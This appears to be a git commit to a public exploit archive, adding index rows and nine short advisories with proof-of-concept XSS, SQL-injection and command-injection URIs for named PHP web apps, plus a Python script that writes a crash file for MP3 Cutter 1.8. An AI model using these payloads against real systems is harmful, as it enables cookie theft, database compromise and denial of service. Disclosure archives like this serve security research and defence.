Updated 08_09_2014
This commit is contained in:
parent
8687f3ea70
commit
7cbd3c3dff
10 changed files with 141 additions and 0 deletions
|
@ -30871,3 +30871,12 @@ id,file,description,date,author,platform,type,port
|
|||
34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow Vulnerabilities",2010-07-07,"Luigi Auriemma",multiple,dos,0
|
||||
34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability",2010-07-05,"Luigi Auriemma",multiple,remote,0
|
||||
34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0
|
||||
34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0
|
||||
34281,platforms/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 File Processing Remote Denial of Service Vulnerability",2010-07-09,"Prashant Uniyal",windows,dos,0
|
||||
34282,platforms/php/webapps/34282.txt,"Real Estate Manager 1.0.1 'index.php' Cross-Site Scripting Vulnerability",2010-07-09,bi0,php,webapps,0
|
||||
34283,platforms/php/webapps/34283.txt,"Model Agency Manager 'search_process.php' Cross-Site Scripting Vulnerability",2009-12-13,bi0,php,webapps,0
|
||||
34284,platforms/php/webapps/34284.txt,"osCSS 1.2.2 'page' Parameter Cross Site Scripting Vulnerability",2010-07-08,"High-Tech Bridge SA",php,webapps,0
|
||||
34285,platforms/php/webapps/34285.txt,"ArticleMS 2.0 'c[]' Parameter Cross Site Scripting Vulnerability",2010-12-13,Packetdeath,php,webapps,0
|
||||
34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0
|
||||
34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 'modules.php' Multiple SQL Injection Vulnerabilities",2009-12-22,"Hadi Kiamarsi",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
15
platforms/php/webapps/34280.txt
Executable file
15
platforms/php/webapps/34280.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/41498/info
|
||||
|
||||
PHPFABER CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
PHPFABER CMS 2.0.5 is vulnerable; prior versions may also be affected.
|
||||
|
||||
The following example URIs are available:
|
||||
|
||||
http://www.example.com/cms/module.php?mod=Search&query=%3Cscript%3Ealert%280%29%3C/script%3E&stype=OR&go=++++Go!++++
|
||||
|
||||
http://www.example.com/cms/module.php/Products/%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
|
||||
|
||||
http://www.example.com/cms/cms_admin/index.php?mod=%3Cscript%3Ealert%280%29%3C/script%3E&action=setup
|
9
platforms/php/webapps/34282.txt
Executable file
9
platforms/php/webapps/34282.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/41507/info
|
||||
|
||||
Real Estate Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Real Estate Manager 1.0.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/index.php?lang=[XSS]
|
7
platforms/php/webapps/34283.txt
Executable file
7
platforms/php/webapps/34283.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/41509/info
|
||||
|
||||
Model Agency Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/search_process.php?searchtype="/><script>alert('XSS')</script>
|
9
platforms/php/webapps/34284.txt
Executable file
9
platforms/php/webapps/34284.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/41510/info
|
||||
|
||||
osCSS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
osCSS version 1.2.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/admin/currencies.php?page=1"><script>alert(document.cookie)</script>&cID=1
|
9
platforms/php/webapps/34285.txt
Executable file
9
platforms/php/webapps/34285.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/41511/info
|
||||
|
||||
ArticleMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
ArticleMS 2.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/search/?a=search&q=PACKETDEATH&advanced=1&sortby=0&finddate=0&c[]=[XSS]
|
11
platforms/php/webapps/34286.txt
Executable file
11
platforms/php/webapps/34286.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/41517/info
|
||||
|
||||
SimpNews is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
SimpNews 2.47.03 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/simpnews/news.php?layout=%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
||||
http://www.example.com/simpnews/news.php?lang=en&layout=layout2&sortorder=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
||||
|
10
platforms/php/webapps/34287.txt
Executable file
10
platforms/php/webapps/34287.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/41521/info
|
||||
|
||||
Yappa (Yet Another PHP Photo Album) is prone to multiple remote command-execution vulnerabilities because it fails to properly validate user-supplied input.
|
||||
|
||||
An attacker can exploit these issues to execute arbitrary commands within the context of the vulnerable system.
|
||||
|
||||
Yappa 3.1.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/yappa/yappa.php?thedir=[ command you ]
|
||||
http://www.example.com/yappa/yappa.php?image=[ command you]
|
13
platforms/php/webapps/34288.txt
Executable file
13
platforms/php/webapps/34288.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/41523/info
|
||||
|
||||
pragmaMX is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
pragmaMX 0.1.11 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&id=111-222-1933email@address.tst
|
||||
http://www.example.com/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
|
||||
http://www.example.com/modules.php?name=Your_Account&op=pass_lost&query=111-222-1933email@address.tst&min=0'+and+31337-31337='0&orderby=dateD
|
||||
http://www.example.com/modules.php?name=Your_Account&rop=showcontent&id=111-222-1933email@address.tst"+and+31337-31337="0
|
||||
|
49
platforms/windows/dos/34281.py
Executable file
49
platforms/windows/dos/34281.py
Executable file
|
@ -0,0 +1,49 @@
|
|||
source: http://www.securityfocus.com/bid/41506/info
|
||||
|
||||
MP3 Cutter is prone to a remote denial-of-service vulnerability.
|
||||
|
||||
An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users.
|
||||
|
||||
MP3 Cutter 1.8 is vulnerable; other versions may also be affected.
|
||||
|
||||
##########################################################
|
||||
## Legion of Xtremers & Hackers Garage
|
||||
## (www.loxian.co.cc) (www.garage4hackers.com)
|
||||
## MP3 Cutter 1.8 Crash Exploit
|
||||
## http://www.aivsoft.com/downloads/mp3cutter/download.html
|
||||
## Author: Prashant a.k.a t3rm!n4t0r
|
||||
## c0ntact: happyterminator@gmail.com
|
||||
##
|
||||
## Greetz to: vinnu, b0nd, fb1h2s, Anarki, Nikhil, D4RK3ST
|
||||
#########################################################
|
||||
|
||||
#exploit.py
|
||||
|
||||
#MP3 cutter Crash Exploit
|
||||
|
||||
print " MP3 Cutter Crash Exploit ( mp3 file ) \n"
|
||||
|
||||
header1 = (
|
||||
"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33"
|
||||
"\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54"
|
||||
"\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54"
|
||||
"\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46"
|
||||
"\x3D\x22"
|
||||
)
|
||||
|
||||
header2 = (
|
||||
"\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59"
|
||||
"\x3E\x3C\x2F\x41\x53\x58\x3E"
|
||||
)
|
||||
|
||||
crash = "\x41" * 10000
|
||||
|
||||
exploit = header1 + crash + header2
|
||||
|
||||
try:
|
||||
out_file = open("crash.mp3",'w')
|
||||
out_file.write(exploit)
|
||||
out_file.close()
|
||||
raw_input("\nExploit file created!\n")
|
||||
except:
|
||||
print "Error"
|
Loading…
Add table
Reference in a new issue